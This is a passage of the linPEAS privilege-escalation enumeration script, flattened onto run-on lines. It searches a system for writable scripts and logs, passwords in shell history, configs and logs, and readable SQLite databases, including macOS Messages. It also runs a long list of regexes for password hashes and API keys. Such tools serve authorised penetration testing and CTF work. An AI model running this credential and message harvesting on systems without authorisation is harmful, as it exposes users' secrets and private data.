cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont <
5){ print line_init; } if (cont == "5"){print
"#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head
-n500) if [ "$iwfbg" ] || [ "$DEBUG" ]; then printf " Group $GREEN$g:\n$NC";
printf "%s\n" "$iwfbg" | while read entry; do if echo "$entry" | grep -q
"You_can_write_even_more_files_inside_last_directory"; then printf
$ITALIC"$entry\n"$NC; elif echo "$entry" | grep -Eq "$writeVB"; then echo
"$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else echo "$entry" | sed
-${E} "s,$writeB,${SED_RED}," fi done fi done echo "" fi fi echo '' echo '' if [
"$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS |
grep -q interesting_files; then print_title "Other Interesting Files"
########################################### #----------) Interesting files
(----------# ########################################### ##-- IF) .sh files in
PATH if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title ".sh files in path"
print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path"
echo $PATH | tr ":" "\n" | while read d; do for f in $(find "$d" -name "*.sh" -o
-name "*.sh.*" 2>/dev/null); do if ! [ "$IAMROOT" ] && [ -O "$f" ]; then echo
"You own the script: $f" | sed -${E} "s,.*,${SED_RED}," elif ! [ "$IAMROOT" ] &&
[ -w "$f" ]; then # If write permision, win found (no check exploits) echo "You
can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo $f | sed
-${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; fi
done done echo "" broken_links=$(find "$d" -type l 2>/dev/null | xargs file
2>/dev/null | grep broken) if [ "$broken_links" ] || [ "$DEBUG" ]; then
print_2title "Broken links in path" echo $PATH | tr ":" "\n" | while read d; do
find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E}
"s,broken,${SED_RED},"; done echo "" fi fi ##-- IF) Date times inside firmware
if [ "$SEARCH_IN_FOLDER" ]; then print_2title "Files datetimes inside the
firmware (limit 50)" find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n"
2>/dev/null | sort | uniq -c | sort | head -n 50 echo "To find a file with an
specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\"
2>/dev/null | grep \"<date>\"" echo "" fi ##-- IF) Executable files added by
user print_2title "Executable files potentially added by user (limit 70)" if ! [
"$SEARCH_IN_FOLDER" ]; then find / -type f -executable -printf "%T+ %p\n"
2>/dev/null | grep -Ev
"000|/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r |
head -n 70 else find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n"
2>/dev/null | grep -Ev
"/site-packages|/python|/node_modules|\.sample|/gems|/cgroup/" | sort -r | head
-n 70 fi echo "" if [ "$MACPEAS" ]; then print_2title "Unsigned Applications"
macosNotSigned /System/Applications fi ##-- IF) Unexpected in /opt if ! [
"$SEARCH_IN_FOLDER" ]; then if [ "$(ls /opt 2>/dev/null)" ]; then print_2title
"Unexpected in /opt (usually empty)" ls -la /opt echo "" fi fi ##-- IF)
Unexpected folders in / if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title
"Unexpected in root" if [ "$MACPEAS" ]; then (find $ROOT_FOLDER -maxdepth 1 |
grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
else (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E}
"s,.*,${SED_RED},") || echo_not_found fi echo "" fi ##-- IF) Modified
interesting files into specific folders in the last 5mins print_2title "Modified
interesting files in the last 5mins (limit 100)" find $ROOT_FOLDER -type f -mmin
-5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path
"/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n
100 | sed -${E} "s,$Wfolders,${SED_RED}," echo "" ##-- IF) Writable log files if
command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq
"[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then # 3.18.0 and below
print_2title "Writable log files (logrotten) (limit 50)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation"
logrotate --version 2>/dev/null || echo_not_found "logrotate"
lastWlogFolder="ImPOsSiBleeElastWlogFolder" logfind=$(find $ROOT_FOLDER -type f
-name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if
(!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0};
if (cont < 3){ print line_init; }; if (cont == "3"){print
"#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50)
printf "%s\n" "$logfind" | while read log; do if ! [ "$IAMROOT" ] && [ "$log" ]
&& [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then
# Only print info if something interesting found if echo "$log" | grep -q
"You_can_write_more_log_files_inside_last_directory"; then printf
$ITALIC"$log\n"$NC; elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v
logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1';
then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used
and print red in that case elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo
"Writable: $log"; elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" &&
[ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log";
echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; fi fi done
fi echo "" if ! [ "$SEARCH_IN_FOLDER" ]; then ##-- IF) Files inside my home
print_2title "Files inside $HOME (limit 20)" (ls -la $HOME 2>/dev/null | head -n
23) || echo_not_found echo "" ##-- IF) Files inside /home print_2title "Files
inside others home (limit 20)" (find $HOMESEARCH -type f 2>/dev/null | grep -v
-i "/"$USER | head -n 20) || echo_not_found echo "" ##-- IF) Mail applications
print_2title "Searching installed mail applications" ls /bin /sbin /usr/bin
/usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi
"$mail_apps" | sort | uniq echo "" ##-- IF) Mails print_2title "Mails (limit
50)" (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null
| head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E}
"s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed
"s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found echo ""
##-- IF) Backup folders if [ "$backup_folders" ] || [ "$DEBUG" ]; then
print_2title "Backup folders" printf "%s\n" "$backup_folders" | while read b ;
do ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; ls -l
"$b" 2>/dev/null && echo "" done echo "" fi fi ##-- IF) Backup files
print_2title "Backup files (limited 100)" backs=$(find $ROOT_FOLDER -type f \(
-name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o
-name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o
-name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) printf "%s\n" "$backs" |
head -n 100 | while read b ; do if [ -r "$b" ]; then ls -l "$b" | grep -Ev
"$notBackup" | grep -Ev "$notExtensions" | sed -${E}
"s,backup|bck|\.bak|\.old,${SED_RED},g"; fi; done echo "" ##-- IF) DB files if [
"$MACPEAS" ]; then print_2title "Reading messages database" sqlite3
$HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null sqlite3
$HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null sqlite3
$HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null fi
if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then print_2title "Searching tables
inside readable .db/.sql/.sqlite files (limit 100)" FILECMD="$(command -v file
2>/dev/null)" printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if [
"$FILECMD" ]; then echo "Found "$(file "$f") | sed -${E}
"s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; else echo "Found $f" | sed -${E}
"s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; fi done SQLITEPYTHON="" echo ""
printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do if ([ -r "$f" ] && [
"$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD"
]); then # If readable and filecmd and sqlite, or readable and not filecmd if [
"$(command -v sqlite3 2>/dev/null)" ]; then tables=$(sqlite3 $f ".tables"
2>/dev/null) #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3
2>/dev/null)" ]; then SQLITEPYTHON=$(command -v python 2>/dev/null || command -v
python3 2>/dev/null) tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in
__import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM
sqlite_master WHERE type=\'table\' and tbl_name NOT like
\'sqlite_%\';').fetchall()]))" 2>/dev/null) #printf "$tables\n" | sed
"s,user.*\|credential.*,${SED_RED},g" else tables="" fi if [ "$tables" ] || [
"$DEBUG" ]; then printf $GREEN" -> Extracting tables from$NC $f $DG(limit
20)\n"$NC printf "%s\n" "$tables" | while read t; do columns="" # Search for
credentials inside the table using sqlite3 if [ -z "$SQLITEPYTHON" ]; then
columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") # Search
for credentials inside the table using python else columns=$($SQLITEPYTHON -c
"print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM
sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name
=\'$t\';').fetchall()[0][0])" 2>/dev/null) fi # Check found columns for
interesting fields INTCOLUMN=$(echo "$columns" | grep -i
"username\|passw\|credential\|email\|hash\|salt") if [ "$INTCOLUMN" ]; then
printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit
10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" printf "$columns\n" |
sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" (sqlite3
$f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in
__import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM
\'$t\';').fetchall()[0]]))") 2>/dev/null | head echo "" fi done fi fi done fi
echo "" if [ "$MACPEAS" ]; then print_2title "Downloaded Files" sqlite3
~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select
LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString,
date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from
LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" fi
##-- IF) Web files if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Web
files?(output limit)" ls -alhR /var/www/ 2>/dev/null | head ls -alhR
/srv/www/htdocs/ 2>/dev/null | head ls -alhR /usr/local/www/apache22/data/
2>/dev/null | head ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head echo "" fi
##-- IF) All hidden files print_2title "All relevant hidden files (not in /sys/
or the ones listed in the previous check) (limit 70)" find $ROOT_FOLDER -type f
-iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec
ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev
"_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme|\.travis.yml"
| head -n 70 echo "" ##-- IF) Readable files in /tmp, /var/tmp, backups if ! [
"$SEARCH_IN_FOLDER" ]; then print_2title "Readable files inside /tmp, /var/tmp,
/private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit
70)" filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp
/private/var/tmp $backup_folders_row -type f 2>/dev/null | grep -Ev
"dpkg\.statoverride\.|dpkg\.status\.|apt\.extended_states\.|dpkg\.diversions\."
| head -n 70) printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ];
then ls -l "$f" 2>/dev/null; fi; done echo "" fi ##-- IF) Passwords in history
cmd if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then print_2title
"Searching passwords in history cmd" history | grep -Ei "$pwd_inside_history"
"$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," echo "" fi ##--
IF) Passwords in history files if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then
print_2title "Searching passwords in history files" printf "%s\n"
"$PSTORAGE_HISTORY" | while read f; do grep -EiH "$pwd_inside_history" "$f"
2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done echo "" fi
##-- IF) Passwords in config PHP files if [ "$PSTORAGE_PHP_FILES" ] || [
"$DEBUG" ]; then print_2title "Searching passwords in config PHP files" printf
"%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiIH
"(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define
?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev
"function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq
| sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g";
done echo "" fi ##-- IF) Passwords files in home if [ "$PSTORAGE_PASSWORD_FILES"
] || [ "$DEBUG" ]; then print_2title "Searching *password* or *credential* files
in home (limit 70)" (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/"
| awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){
print line_init; } if (cont == "3"){print " #)There are more creds/passwds files
in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0};
pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed
"s,There are more creds/passwds files in the previous parent
folder,${C}[3m&${C}[0m,") || echo_not_found echo "" fi ##-- IF) TTY passwords if
! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Checking for TTY (sudo/su)
passwords in audit logs" aureport --tty 2>/dev/null | grep -E "su |sudo " | sed
-${E} "s,su|sudo,${SED_RED},g" find /var/log/ -type f -exec grep -RE
'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E}
"s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" echo "" fi
##-- IF) IPs inside logs if [ "$DEBUG" ] || ( ! [ "$FAST" ] && ! [ "$SUPERFAST"
] && ! [ "$SEARCH_IN_FOLDER" ] ); then print_2title "Searching IPs inside logs
(limit 70)" (find /var/log/ /var/logs /private/var/log -type f -exec grep -R -a
-E -o
"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
"{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n |
head -n 70 echo "" fi ##-- IF) Passwords inside logs if ! [ "$SEARCH_IN_FOLDER"
]; then print_2title "Searching passwords inside logs (limit 70)" (find
/var/log/ /var/logs/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}"
\;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not
exist:\|modules-config/config-set-passwords\|config-set-passwords already
ran\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed
-${E} "s,pwd|passw,${SED_RED}," echo "" fi if [ "$DEBUG" ] || ( ! [ "$FAST" ] &&
! [ "$SUPERFAST" ] && ! [ "$SEARCH_IN_FOLDER" ] ); then ##-- IF) Emails inside
logs print_2title "Searching emails inside logs (limit 70)" (find /var/log/
/var/logs/ /private/var/log -type f -exec grep -I -R -E -o
"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null |
sort | uniq -c | sort -r -n | head -n 70 | sed -${E}
"s,$knw_emails,${SED_GREEN},g" echo "" fi if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]
&& [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords print_2title
"Searching possible password variables inside key folders (limit 140)" if ! [
"$SEARCH_IN_FOLDER" ]; then timeout 150 find $HOMESEARCH -exec grep -HnRiIE
"($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+"
'{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" |
sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed
-${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables3,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables4,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables5,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables6,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables7,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables8,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables9,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables10,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables11,${SED_RED},g" & timeout 150 find /var/www
$backup_folders_row /tmp /etc /mnt /private grep -HnRiIE
"($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+"
'{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" |
sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed
-${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables3,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables4,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables5,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables6,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables7,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables8,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables9,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables10,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables11,${SED_RED},g" & else timeout 150 find $SEARCH_IN_FOLDER
-exec grep -HnRiIE
"($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+"
'{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" |
sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed
-${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables3,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables4,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables5,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables6,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables7,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables8,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables9,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables10,${SED_RED},g" | sed -${E}
"s,$pwd_in_variables11,${SED_RED},g" & fi wait echo "" ##-- IF) Find possible
conf files with passwords print_2title "Searching possible password in config
files (if k8s secrets are found you need to read the file)" if ! [
"$SEARCH_IN_FOLDER" ]; then ppicf=$(timeout 150 find $HOMESEARCH /var/www/
/usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o
-name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml"
2>/dev/null) else ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o
-name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml"
2>/dev/null) fi printf "%s\n" "$ppicf" | while read f; do if grep -qEiI
'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config'
\"$f\" 2>/dev/null; then echo "$ITALIC $f$NC" grep -HnEiIo
'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config'
"$f" 2>/dev/null | sed -${E}
"s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" fi done echo ""
fi fi echo '' echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read
"asd"; fi if echo $CHECKS | grep -q api_keys_regex; then print_title "API Keys
Regex" search_for_regex(){ title=$1 regex=$2 caseSensitive=$3 if [
"$caseSensitive" ]; then i="i" else i="" fi print_3title_no_nl "Searching
$title..." if [ "$SEARCH_IN_FOLDER" ]; then timeout 120 find "$ROOT_FOLDER"
-type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \;
2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & else # Search in
home direcoties (usually the slowest) timeout 120 find $HOMESEARCH -type f -not
-path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed
'/^.\{150\}./d' | sort | uniq | head -n 50 & # Search in etc timeout 120 find
/etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \;
2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & # Search in opt
timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i
"$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
# Search in possible web folders (usually only 1 will exist) timeout 120 find
/var/www /usr/local/www /usr/share/nginx /Library/WebServer/ -type f -not -path
"*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed
'/^.\{150\}./d' | sort | uniq | head -n 50 & # Search in logs timeout 120 find
/var/log /var/logs /Library/Logs -type f -not -path "*/node_modules/*" -exec
grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq |
head -n 50 & # Search in backups timeout 120 find $backup_folders_row -type f
-not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null |
sed '/^.\{150\}./d' | sort | uniq | head -n 50 & # Search in others folders
(usually only /srv or /Applications will exist) timeout 120 find /tmp /srv
/Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex"
'{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & fi wait
printf "\033[2K\r" } if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then print_2title
"Searching Hashed Passwords" search_for_regex "Apr1 MD5"
"\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" search_for_regex "Apache SHA"
"\{SHA\}[0-9a-zA-Z/_=]{10,}" search_for_regex "Blowfish"
"\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" search_for_regex "Drupal"
"\$S\$[a-zA-Z0-9_/\.]{52}" search_for_regex "Joomlavbulletin"
"[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" search_for_regex "Linux MD5"
"\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" search_for_regex "phpbb3"
"\$H\$[a-zA-Z0-9_/\.]{31}" search_for_regex "sha512crypt"
"\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" search_for_regex "Wordpress"
"\$P\$[a-zA-Z0-9_/\.]{31}" echo '' print_2title "Searching Raw Hashes"
search_for_regex "sha512" "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)"
echo '' print_2title "Searching APIs" search_for_regex "Adobe Client Id (Oauth
Web)" "(adobe[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{32})['\"]" 1
search_for_regex "Abode Client Secret" "(p8e-)[a-z0-9]{32}" 1 search_for_regex
"Age Secret Key" "AGE-SECRET-KEY-1[QPZRY9X8GF2TVDW0S3JN54KHCE6MUA7L]{58}"
search_for_regex "Airtable API Key"
"[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']\"" search_for_regex
"Alchemi API Key" "(alchemi[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9-]{32})['\"]" 1
search_for_regex "Alibaba Access Key ID" "(LTAI)[a-z0-9]{20}" 1 search_for_regex
"Alibaba Secret Key" "(alibaba[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{30})['\"]" 1
search_for_regex "Artifactory API Key & Password"
"[\"']AKC[a-zA-Z0-9]{10,}[\"']|[\"']AP[0-9ABCDEF][a-zA-Z0-9]{8,}[\"']"
search_for_regex "Asana Client ID" "((asana[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9]{16})['\"])|((asana[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1
search_for_regex "Atlassian API Key" "(atlassian[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{24})['\"]" 1
search_for_regex "AWS Client ID"
"(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}"
search_for_regex "AWS MWS Key"
"amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
search_for_regex "AWS Secret Key" "aws(.{0,20})?['\"][0-9a-zA-Z\/+]{40}['\"]"
search_for_regex "AWS AppSync GraphQL Key" "da2-[a-z0-9]{26}" search_for_regex
"Basic Auth Credentials" "://[a-zA-Z0-9]+:[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+"
search_for_regex "Beamer Client Secret" "(beamer[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"](b_[a-z0-9=_\-]{44})['\"]" 1
search_for_regex "Binance API Key" "(binance[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{64})['\"]" 1
search_for_regex "Bitbucket Client Id" "((bitbucket[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{32})['\"])" 1
search_for_regex "Bitbucket Client Secret" "((bitbucket[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9_\-]{64})['\"])" 1
search_for_regex "BitcoinAverage API Key" "(bitcoin.?average[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{43})['\"]" 1
search_for_regex "Bitquery API Key" "(bitquery[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([A-Za-z0-9]{32})['\"]" 1
search_for_regex "Birise API Key" "(bitrise[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9_\-]{86})['\"]" 1
search_for_regex "Block API Key" "(block[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4})['\"]"
1 search_for_regex "Blockchain API Key"
"mainnet[a-zA-Z0-9]{32}|testnet[a-zA-Z0-9]{32}|ipfs[a-zA-Z0-9]{32}"
search_for_regex "Blockfrost API Key" "(blockchain[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[0-9a-f]{12})['\"]"
1 search_for_regex "Box API Key" "(box[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-zA-Z0-9]{32})['\"]" 1
search_for_regex "Bravenewcoin API Key" "(bravenewcoin[a-z0-9_
\.,\-]{0,25})(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([a-z0-9]{50})['\"]" 1
search_for_regex "Clearbit API Key" "sk_[a-z0-9]{32}" search_for_regex "Clojars
API Key" "(CLOJARS_)[a-zA-Z0-9]{60}" search_for_regex "Cloudinary Basic Auth"
